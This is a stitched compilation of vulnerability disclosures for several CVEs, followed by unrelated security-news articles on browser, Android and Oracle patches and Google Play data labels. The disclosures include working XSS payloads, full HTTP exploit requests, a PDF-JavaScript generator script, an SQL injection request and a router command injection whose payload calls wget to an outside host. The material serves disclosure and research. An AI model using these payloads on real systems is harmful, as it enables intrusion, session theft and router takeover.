A cross-site scripting (XSS) vulnerability in /public/admin/index.php?add_product of E-Commerce Website v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Product Title text field.

**Full-Ecommece-Website-Add\_Product-Stored\_XSS-POC**

*   Note => Login to admin
*   Description => Stored\_XSS at Product Title

**Step to Reproduct**

*   Login to admin -> Add Product -> input payload <img/src/onerror=prompt(10)> at Product Title -> Product Title

**Exploit**

**Vulnerable Code**

 

*   When inserting into the database, the input is not filtered out characters

**POC**

*   Injection Point

\------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_title"

<image/src/onerror=prompt(8)>

*   Request

POST /Full-Ecommece-Website/Codes/public/admin/index.php?add\_product HTTP/1.1
Host: localhost:8080
Content-Length: 1354971
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXtBAIsNDayF64Ebh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/Full-Ecommece-Website/Codes/public/admin/index.php?add\_product
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=oam3rcbi14nilh2pp3s21upev5; twk\_uuid\_5c2396fb7a79fc1bddf24b28={"uuid":"1.AGDzvqvmbboNUBtyBA0XLKxrviwKWw7HVKOjPqv5aIOJHjOnigPvpa5cn7QPGv6D5QwLM7ZIIBSpua1NrhQBpEeAdolcmuMk3JJtap3Nu2WjBL31HFdBqMF9VFcu8Olw","version":3,"domain":null,"ts":1647022863776}; TawkConnectionTime=0
Connection: close

------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_title"

<image/src/onerror=prompt(8)>
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_description"

hacked
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_price"

10000
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="short\_desc"

hacked
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="publish"

Publish
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_category\_id"

12
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_quantity"

1
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="file"; filename="car.png"
Content-Type: image/png

PNG

VIDEO POC https://drive.google.com/file/d/155K4qLwGI8kwctd5FijU9gzonSA2rMFz/view?usp=sharing

CVE-2022-27330: GitHub - CP04042K/Full-Ecommece-Website-Add_Product-Stored_XSS-POC

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS 1.5.1 that allows an authenticated user to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 that allows an authenticated user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.  
1、login as admin .in the Assets page  
  
2、Use the following PoC to generate malicious files :

    # FROM https://github.com/osnr/horrifying-pdf-experiments
    import sys
    
    from pdfrw import PdfWriter
    from pdfrw.objects.pdfname import PdfName
    from pdfrw.objects.pdfstring import PdfString
    from pdfrw.objects.pdfdict import PdfDict
    from pdfrw.objects.pdfarray import PdfArray
    
    def make_js_action(js):
        action = PdfDict()
        action.S = PdfName.JavaScript
        action.JS = js
        return action
     
    def make_field(name, x, y, width, height, r, g, b, value=""):
        annot = PdfDict()
        annot.Type = PdfName.Annot
        annot.Subtype = PdfName.Widget
        annot.FT = PdfName.Tx
        annot.Ff = 2
        annot.Rect = PdfArray([x, y, x + width, y + height])
        annot.MaxLen = 160
        annot.T = PdfString.encode(name)
        annot.V = PdfString.encode(value)
     
        # Default appearance stream: can be arbitrary PDF XObject or
        # something. Very general.
        annot.AP = PdfDict()
     
        ap = annot.AP.N = PdfDict()
        ap.Type = PdfName.XObject
        ap.Subtype = PdfName.Form
        ap.FormType = 1
        ap.BBox = PdfArray([0, 0, width, height])
        ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0])
        ap.stream = """
    %f %f %f rg
    0.0 0.0 %f %f re f
    """ % (r, g, b, width, height)
    
        # It took me a while to figure this out. See PDF spec:
        # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641
    
        # Basically, the appearance stream we just specified doesn't
        # follow the field rect if it gets changed in JS (at least not in
        # Chrome).
    
        # But this simple MK field here, with border/color
        # characteristics, _does_ follow those movements and resizes, so
        # we can get moving colored rectangles this way.
        annot.MK = PdfDict()
        annot.MK.BG = PdfArray([r, g, b])
    
        return annot
    
    def make_page(fields, script):
        page = PdfDict()
        page.Type = PdfName.Page
    
        page.Resources = PdfDict()
        page.Resources.Font = PdfDict()
        page.Resources.Font.F1 = PdfDict()
        page.Resources.Font.F1.Type = PdfName.Font
        page.Resources.Font.F1.Subtype = PdfName.Type1
        page.Resources.Font.F1.BaseFont = PdfName.Helvetica
    
        page.MediaBox = PdfArray([0, 0, 612, 792])
    
        page.Contents = PdfDict()
        page.Contents.stream = """
    BT
    /F1 24 Tf
    ET
        """
    
        annots = fields
    
        page.AA = PdfDict()
        # You probably should just wrap each JS action with a try/catch,
        # because Chrome does no error reporting or even logging otherwise;
        # you just get a silent failure.
        page.AA.O = make_js_action("""
    try {
      %s
    } catch (e) {
      app.alert(e.message);
    }
        """ % (script))
    
        page.Annots = PdfArray(annots)
        return page
    
    if len(sys.argv) > 1:
        js_file = open(sys.argv[1], 'r')
    
        fields = []
        for line in js_file:
            if not line.startswith('/// '): break
            pieces = line.split()
            params = [pieces[1]] + [float(token) for token in pieces[2:]]
            fields.append(make_field(*params))
    
        js_file.seek(0)
    
        out = PdfWriter()
        out.addpage(make_page(fields, js_file.read()))
        out.write('result.pdf')
    

  
3、back to Assets then we can see xss-cookie.svg have been upload:  
  
4、when user click the xss.pdf it will trigger a XSS attack

CVE-2022-28599: A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 · Issue #595 · daylightstudio/FUEL-CMS

MCMS v5.2.27 was discovered to contain a SQL injection vulnerability in the orderBy parameter at /dict/list.do.

A suspicious point was found in the IDictDao.xml file in the lib,ms-mdiy-2.1.12  
.net.mingsoft.mdiy.dao.IDictDao.xml#145  

Since the query maps to a method in Java, and this XML corresponds to Content,we looked directly in net.mingsoft.mdiy.action.DictAction and found a call to

net.mingsoft.mdiy.biz.dictBiz#query  

we can know that the suspicious injection point is orderBy, and then try to inject

    
    GET /ms/mdiy/dict/list.do?pageNo=1&pageSize=22&orderBy=1/**/or/**/updatexml(1,concat(0x7e,user(),0x7e),1)/**/or/**/1 HTTP/1.1
    Host: 10.28.246.83:8080
    Content-Length: 0
    Pragma: no-cache
    Accept: application/json, text/plain, */*
    Cache-Control: no-cache
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Origin: http://10.28.246.83:8080
    Referer: http://10.28.246.83:8080/ms/mdiy/dict/index.do?
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=AAF6841C2E815174E1AF5498DBEDD12F; rememberMe=d56VV14gjxKRUu7SYYOTuOS8X48lfVhblbN4aL/wCBkaL805vU01qmEfZCk2PpqohqQ4bUuxyGvEzVrXqlVgeKFxrQHcgxhKPbzopVs4p5ftVg3+jnz3WkOHLrycrJKOVR+peOYM+3bbysPywLp/w/PGdFU0+ooXhCJbO8qMeXvR6U6RSTOOnvBq/P9ySYdwnqt0uIywoCNv8hE6gAgnhZUt4PBYLlZ4EekzFyLDqKJXJ5sOUuzR8/fPGjOoVzMydW3EIFJ0f2i59RQJe4fsx6i1NlnR1C9muMEaDUqj70Ec+M50tjnStsJNPCrSYzl2+KMzPXpoBS1DWCpURi5/ZCBp/FahWwnJZ6cA0owYZC9dXNC1b1FQoC2fIO5SPcNtEyySdD6c6BnA9Leei5iYTEIkPKHIw1oQhF7voRadkfW40ZmdPUTot5Gd8g7pDqpNNd/sig45EQtGqeXWwP45T2BcE1OKkPC9D+ELtqQSzOWcu7GUQkJ7jsECXu+ghoq/uihlh5Xdx1a8H8hhznmpJJd3hK2W+fy1IBAiH4GzkhQbepycUPqxD0t+ufNTFN5B0upouiyMiHSLejjdIkCl325p4rLi8TchVRxsKS0/Z9PflifFvaauQoTalNDa+vZXYvBrnVjXyRl3cUn4HPzTPBVNpXqnHPxf1jNtxtJKL09szd3OMRABDyIvL+T0JHl8pskKjEo80luOEP5f+ta2TW1XutmZJupbr6d97mfeRE9GDIYWFuHafXkh5uSBTkauPpQA7x25vhs1BjU5OVZ2ipfcPvH6WaPCcBJYM8Vqyd6g+5mdpsw7Hb27LcGxFo9dE39pBNjy8+1q6QqIojSfTRLfz1f/wGKgdOqy3x9z2+0SYi+irxF52r7FQgBZtTcGUu+1WPJJQEmG3BnUAkI7hpG1BmmjeHjDRgnOvA+L1LugHVQUYNN/Z8XzahHcDkNHr54/WXeQP56p0LC/E/D+XMCOSxCYkYnZdboRABf4Hwj+THJSTp+ZRsFjrZt27WWhJtDfGTgahpJLPioFUT/3HCnZKz529Ia9R1dTMHaKlxYrxf04GvgNCiFmslLqZX+9RlZizYNXCLRKECj83ovRCFJP5Ofg9SK+fNKNruL4uW5U4B+vLEuLhxCv7BzGFpjjciIOh8z6ypCQJDkuYUv/rffs0F1ngGI8TdAKhFxMnVbyUplk0+cYVQaBx1JTablsA+VgSl8n8+qhDoNA44TBg4OsrTaSMhcCha5b7OwczozSFDvJOR15GXgIKbJOTGSAJ5JhFFeQhkmpVWOGC4d9KdmHl6KUIOyB8DtO2ZU/XpTPbvFQGLvyyo1t7dPrvzHqG9LYmoQAcye6278=
    Connection: close

CVE-2022-27466: MCMS 5.2.7 SQLI · Issue #90 · ming-soft/MCMS

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability in `SetIPv6Status` function

**Tenda AX18 v1.0.0.1 has a commend injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: Tenda (https://tenda.com.cn)
*   **Products**: WiFi Router AX1806 v1.0.0.1 and AX1803 v1.0.0.1
*   **Firmware download address:** https://tenda.com.cn/download/detail-3225.html
*   **Firmware download address:** https://www.tenda.com.cn/product/download/AX1806.html

**Description****1.Product Information:**

Tenda AX1806 v1.0.0.1 and AX1803 v1.0.0.1 router, the latest version of simulation overview：

**2\. Vulnerability details**

Tenda AX1806 and AX1803 was discovered to contain a command injection vulnerability in SetIPv6Status function

When we set connect type = PPPoE we will get a command injection vulnerability after login.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(wget http://192.168.2.2:9999/)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-28572: CVEIDs/TendaAX18 at main · F0und-icu/CVEIDs

CVE-2022-28572: TempName/TendaAX18 at main · F0und-icu/TempName

The RSS extension before 2022-04-29 for MediaWiki allows XSS via an rss element (if the feed is in $wgRSSUrlWhitelist and $wgRSSAllowLinkTag is true).

**

XSS in Extension:RSS when $wgRSSAllowLinkTag = true;

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

This is a WMF deployed extension, however $wgRSSAllowLinkTag is false on cluster, so it is not vulnerable in the configuration used by WMF.

RSS extension implementation of strip markers suffers from a similar problem as MW core's used to before T110143 was fixed. When $wgRSSAllowLinkTag is set to true, you can use this to escape from an attribute.

As an example:

*   Set $wgRSSAllowLinkTag = true;

Create an rss feed as follows:

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
        \>

<channel>
        <title>Test</title>
<item>
                <title>First item</title>
                <link>https://example.com</link>
                    
                                        <description><!\[CDATA\[<a title="tabindex=1 autofocus onmouseover=alert(1) onfocus=blur() onblur=alert(document.domain)//"> Should autotrigger on chrome, and trigger on hover on firefox</a> \]\]></description>
</item>
</channel>
</rss>

*   Be sure the above RSS feed is added to $wgRSSUrlWhitelist
*   Create a template named Template:RSS containing only

<div title="{{{description}}}"></div>

*   Use the following tag on a page <rss templatename=RSS>http://address.of.rss.feed.from.above</rss>

This should make an XSS that autotriggers on chrome, and triggers on hoover in firefox.

Best solution, is to probably copy what MW core does for strip markers with them including "'

Author Affiliation

Wikimedia Communities

*   Mentions

**Event Timeline**

Comment Actions

Its related to the custom strip marker scheme, i'm not sure if that's what is being referred to in the other task. The code path involved here is the one using the Sanitizer, not the one with a custom escaping function.

The actual escapeTemplateParameter isn't really a security boundry most of the time except when used with insertStripItem, since the results get parsed later in most cases.

Comment Actions

Proposed patch

Extension doesn't seem to have a maintainer to CC on this task. I assume I should not just throw on gerrit since its WMF deployed, even if this code path is not enabled on cluster.

Comment Actions

> Extension doesn't seem to have a maintainer to CC on this task. I assume I should not just throw on gerrit since its WMF deployed, even if this code path is not enabled on cluster.

Since ext:RSS isn't bundled, it would go out with the next supplemental release, which is tracked at T305209. I've added it there for now. Since this isn't currently vulnerable within Wikimedia production (and likely wouldn't ever be) I'd consider it low risk pushing it through gerrit. I think the only concern would be if other mediawiki operators were left uninformed or vulnerable for some time period, but IME we've tended not to care about that as much in the past and have just tried to merge security bug fixes quickly, make tasks public and send out the supplemental release each quarter, as best efforts.

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2022-29969: ⚓ T307028 XSS in Extension:RSS when $wgRSSAllowLinkTag = true;

A Dom-based Cross-site scripting (XSS) vulnerability at registration account in Cyclos 4 PRO.14.7 and before allows remote attackers to inject arbitrary web script or HTML via the groupId parameter.

**Author:** Tin Pham aka TF1T of VietSunshine Cyber Security Services

**Vendor Homepage:** https://www.cyclos.org/

**Version:** Cyclos 4.14.7 (and prior)

**Description:** A Dom-based Cross-site scripting (XSS) vulnerability at registration account in Cyclos 4 PRO.14.7 and before allows remote attackers to inject arbitrary web script or HTML via the groupId parameter.

**Steps to reproduce:** An attacker sends a draft URL _\[IP\]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E_ to victim. When a victim opens the URL, XSS will be triggered.

**

Thông tin bên lề về lỗ hổng

**

Cách đây một năm, trong khi tham gia một chương trình Bug bounty ở Whitehub, target mà chương trình mình tham gia sử dụng một Banking Software có tên là Cyclos. Sau khi xem sơ lược các chức năng chính, mình nhận thấy tại chức năng đăng ký tài khoản khi giá trị tham số groupId không tồn tại thì xuất hiện thông báo lỗi đính kèm giá trị groupId mà ta nhập vào.

Vì thông báo lỗi có đính kèm giá trị mà ta nhập vào, rất có thể vị trí này tồn tại lỗ hổng XSS. Kiểm tra bằng cách chèn payload: <img src=xxx onerror=alert(document.domain)> vào tham số **groupId**

Xác nhận lỗ hổng Dom-based XSS

Để tìm source và sink của các lỗ hổng Dom-based XSS, ta sẽ chèn debugger vào payload và debug trên trình duyệt Chrome, xem thanh Call Stack, ta tìm được source và sink như sau:

**source:** location.hash tại cyclos.gwt-0.js1

if (a == null || a.length == 0) {

**sink:** innerHTML tại cyclos.gwt-0.js1

Và sau 1 năm chờ đợi mình có đã CVE đầu tiên. Cảm ơn các bạn đã đọc bài viết.

CVE-2021-31673: Cyclos 4.14.7 - Dom-based Cross-Site Scripting (CVE-2021-31673)

Google has released an update for the Chrome browser that includes 30 security fixes. Edge and other Chromium-based browsers also need updating.
The post Update now! Critical patches for Chrome and Edge appeared first on Malwarebytes Labs.

Google has released an update for its Chrome browser that includes 30 security fixes. The latest version of the stable channel is now Chrome 101.0.4951.41 for Windows, Mac and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

Microsoft advises Edge users—which is essentially a Microsoft-badged version of Chrome—to update as well, since it shares many of these vulnerabilities.

Seven of the vulnerabilities are rated as “high.” Five of those vulnerabilities are “Use after free” flaws, which, thanks to a memory relocation issue, can allow hackers to pass arbitrary code to a program. Which is another way of saying that attackers can do unauthorized things on your computer just by getting you to go to a malicious web page coded to exploit these problems.

**Use after free**

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The use after free vulnerabilities that are listed with a high severity are:

*   **CVE-2022-1477**, a use-after-free vulnerability in the Vulkan graphics API.
*   **CVE-2022-1478**, a use-after-free vulnerability in the SwiftShader 3D renderer.
*   **CVE-2022-1479**, a use-after-free vulnerability in ANGLE a “graphics engine abstraction layer.”
*   **CVE-2022-1480**, is a use-after-free vulnerability in Device API. A remote attacker can reportedly create a specially crafted web page, trick the victim into visiting it, trigger the use-after-free error and execute arbitrary code on the target system.
*   **CVE-2022-1481**, is a use-after-free vulnerability in Sharing. This vulnerability can be reportedly be exploited by a remote non-authenticated attacker via the Internet, by luring the victim to a specially crafted web page.

**Other high severity vulnerabilities**

There are two other vulnerabilities listed as high severity issues:

*   **CVE-2022-1482**, is described as an “Inappropriate implementation in WebGL” in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it and compromise their system.
*   **CVE-2022-1483**, is a heap buffer overflow in WebGPU, a web API that exposes modern computer graphics capabilities for the Web. Heap is the name for a region of a process’ memory which is used to store dynamic variables. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, the two common areas that are targeted for overflows are the stack and the heap.

**How to update**

If you’re a Chrome user on Windows, Mac, or Linux, you should update to version 101.0.4951.41 as soon as possible.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up blocking automatic updates if you never close the browser, or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerabilities listed.

My preferred method is to have Chrome open the page **chrome://settings/help** which you can also find by clicking **Settings > About Chrome**.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

So you don’t have to track the version number, when Chrome is up to date it displays the message “Chrome is up to date”

After the updates Chrome should be at version 101.0.4951.41 and Edge should be at version 101.0.1210.32.

Stay safe, everyone!

Update now! Critical patches for Chrome and Edge

Plus: Microsoft patched some 100 flaws, while Oracle issued more than 500 security fixes.

To find the update, you’ll need to check your device settings. Devices that have received the Android April update so far include Google’s Pixel devices and some third-party Android phones, including the Samsung Galaxy A32 5G, A51, A52 5G, A53 5G, A71, S10 series, S20 series, Note20 series, Z Flip 5G, Z Flip3, Z Fold, Z Fold2, and the Z Fold3, as well as the OnePlus 9 and OnePlus 9 Pro.

Google Chrome Emergency Updates

As the world’s biggest browser with over 3 billion users, it’s no surprise attackers are targeting Google Chrome. Browser-based attacks are particularly worrying because they can potentially be chained together with other vulnerabilities and used to take over your device.

It has been a particularly busy month for the team behind Google’s Chrome browser, which has seen several security updates within weeks of each other. The latest, pushed out in mid-April, fixes two issues including a high-severity zero-day vulnerability, CVE-2022-1364, which is already being used by attackers.

The technical details aren’t currently available, but the timing of the fix—just a day after it was reported—indicates it’s pretty serious. If you use Chrome, your browser should now be on version 100.0.4896.127 to include the fix. You’ll need to restart Chrome after the update has installed to ensure it activates.

The Chrome issue also impacts other Chromium-based browsers, including Brave, Microsoft Edge, Opera, and Vivaldi, so if you use one of those, make sure you apply the patch.

But that’s not all. On April 27, Google announced another Chrome update, fixing 30 security vulnerabilities. None of these have been exploited yet, the company says, but seven are rated as being a high risk. The update takes the browser to version 101.0.4951.41.

Oracle’s April 2022 Critical Patch Update

In mid-April, Oracle released its quarterly Critical Patch Update, including a whopping 520 security fixes. Some of the issues fixed in the update are serious—300 of them can be exploited remotely without authentication, and 75 security issues are rated as critical severity. Some of the Oracle patches address CVE-2022-22965, aka Spring4Shell, a remote code execution (RCE) flaw in the spring framework.

Microsoft’s Busy April Patch Tuesday

Microsoft had a major Patch Tuesday in April, issuing fixes for over 100 vulnerabilities, including 10 critical RCE flaws. One of the most important, CVE-2022-24521, is already being exploited by attackers, according to the company.

Reported by the NSA and researchers at CrowdStrike, the issue in the Windows Common Log File system driver doesn’t require human interaction to be exploited and can be used to obtain administrative privileges on a logged-in system. Other notable fixes include CVE-2022-26904—a publicly known issue—and CVE-2022-26815, a severe DNS Server flaw.

Mozilla Thunderbird 91.8.0 Fix

On April 5, Mozilla released a patch to fix security issues in its Thunderbird email client as well as its Firefox browser. The details are scant, but Thunderbird 91.8 fixes four vulnerabilities rated as having a high impact, some of which could be exploited to run arbitrary code.

Firefox ESR 91.8 and Firefox 99 also fix multiple security issues.

WordPress Plugin Elementor Version 3.6.3 

The Elementor website builder plug-in for WordPress has received a big security fix in April for a critical-rated vulnerability that could allow attackers to perform remote code execution and effectively take over a website.

Found by researchers at Plugin Vulnerabilities, the flaw was introduced in the plug-in in version 3.6.0, released on March 22. “We would recommend not using this plugin until it has had a thorough security review and all issues are addressed,” the researchers said.

Although the attacker must be authenticated to exploit the issue, it’s still pretty serious because anyone logged into an affected website can exploit it. The update for Elementor’s 5 million users, version 3.6.3, should be applied as soon as possible.

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   This startup wants to watch your brain
*   The artful, subdued translations of modern pop
*   Netflix doesn't need a password-sharing crackdown
*   How to revamp your workflow with block scheduling
*   The end of astronauts—and the rise of robots
*   👁️ Explore AI like never before with our new database
*   ✨ Optimize your home life with our Gear team’s best picks, from robot vacuums to affordable mattresses to smart speakers

You Need to Update iOS, Android, and Chrome Right Now

Google has been busy. After introducing badges for browser apps, it's also launched its "nutrition labels" for apps.
The post Google Play’s Data safety section empowers Android users to make informed app choices appeared first on Malwarebytes Labs.

Google has launched its new “nutrition labels” for apps, a feature it promised in the spring of 2021. This release came days after the Chrome team released badges for the Chrome Web Store for browser extensions.

The company said in a blog post that it’s rolling out the labels—which it calls the Google Play Data safety section—gradually to users.

The labels are released weeks ahead of the July 20 deadline, the date when developers are required to adequately disclose what their apps do. This includes what data they collect, how it is shared with third parties (if ever), and how they secure user data. “We heard from users and app developers that displaying the data an app collects, without additional context, is not enough,” Google said.

Indeed, the search giant followed Apple’s lead when it introduced app privacy labels in its App Store in December 2020.

The Data safety section’s design relied heavily on feedback from Android users, who also want to know for what purpose their data is collected and whether app developers are sharing it. Google added information on whether an app needs data to function or if data collection is optional. Below is a list of other information that developers can show in the Data safety section of their apps:

> – Whether a qualifying app has committed to following Google Play’s Families Policy to better protect children in the Play store.  
> – Whether the developer has validated their security practices against a global security standard (more specifically, the MASVS).

While this new feature is in place so Android users can make informed choices when it comes to trusting an app with their data, it’s still up to developers to disclose what their apps are capable of. Google said that if it finds a developer misstating their app’s features, the company will ask them to fix it instead of removing the app straight away. Action is only taken if the app remains uncompliant.

We will see if Google does a better job implementing its labels than Apple. If you recall, many labels in the App Store were found to be unreliable as they provided false information.

Here is the Google Play Help page for the Data safety section if you want to read more.

Tag

#chrome